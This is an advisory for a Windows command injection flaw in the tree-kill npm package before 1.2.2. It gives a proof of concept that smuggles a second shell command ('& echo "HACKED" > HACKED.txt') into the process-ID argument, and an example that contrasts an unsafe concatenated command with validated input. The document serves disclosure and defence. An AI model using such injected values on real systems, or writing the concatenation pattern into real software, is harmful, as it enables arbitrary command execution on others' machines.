Command Injection Affecting tree-kill package, versions <1.2.2


0.0
high

Snyk CVSS

    Exploit Maturity Proof of concept
    Attack Complexity High
    Confidentiality High
    Integrity High
    Availability High
NVD
9.8 critical

  • Snyk ID SNYK-JS-TREEKILL-536781
  • published 5 Dec 2019
  • disclosed 4 Dec 2019
  • credit mik317

How to fix?

Upgrade tree-kill to version 1.2.2 or higher.

Overview

tree-kill is a package to kill all processes in the process tree, including the root process.

Affected versions of this package are vulnerable to Command Injection. User input is concatenated into a command within tree-kill and treekill, and that command is then executed without any validation.

Note: This vulnerability is only applicable if the package is used on a Windows operating system.

PoC by mik317

  1. Create this POC file

    //poc.js
    var kill = require('tree-kill');
    kill('3333332 & echo "HACKED" > HACKED.txt & ');
    
  2. Execute the following commands in another terminal:

    npm i tree-kill # Install affected module
    dir # Check *HACKED.txt* doesn't exist
    node poc.js #  Run the PoC
    dir # Now *HACKED.txt* exists :)
    
  3. A new file called HACKED.txt will be created, containing the HACKED string
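
For applications that pass externally supplied values to a kill routine, the following added example (not code from tree-kill or from this advisory) contrasts the concatenation pattern described in the Overview with a validated argument-vector form. The `taskkill` command shape, the function names and the stub runner are assumptions made for illustration.

```javascript
// Input taken from the PoC on this page.
const POC_INPUT = '3333332 & echo "HACKED" > HACKED.txt & ';

// Vulnerable pattern: caller input is concatenated into one shell command line.
// Assumption: the command shape is illustrative, not copied from tree-kill.
function buildKillCommandUnsafe(pid) {
  return 'taskkill /pid ' + pid + ' /T /F';
}

// Hardened pattern: accept only a positive decimal integer and return an
// argument vector, so the value is never parsed by a shell.
function buildKillArgsSafe(pid) {
  const text = typeof pid === 'number' ? String(pid) : pid;
  if (typeof text !== 'string' || !/^[1-9][0-9]{0,9}$/.test(text)) {
    throw new TypeError('pid must be a positive integer');
  }
  return ['/pid', text, '/T', '/F'];
}

// Hypothetical wrapper: validate first, then hand argv to a runner such as
// child_process.execFile (passed in so this example runs offline).
function safeKill(pid, run) {
  return run('taskkill', buildKillArgsSafe(pid));
}

// Stub runner that records the call instead of executing anything.
function recordingRunner(file, args) {
  return { file, args };
}

// Runs the PoC input through both patterns and reports what each produces.
function demo() {
  const results = { unsafe: buildKillCommandUnsafe(POC_INPUT) };
  results.legit = safeKill(3333332, recordingRunner);
  try {
    safeKill(POC_INPUT, recordingRunner);
    results.rejected = false;
  } catch (err) {
    results.rejected = err instanceof TypeError;
  }
  return results;
}

console.log(demo());
```

The strict pattern rejects the PoC string outright instead of truncating it to its numeric prefix, which makes malformed input visible to the caller and to logs.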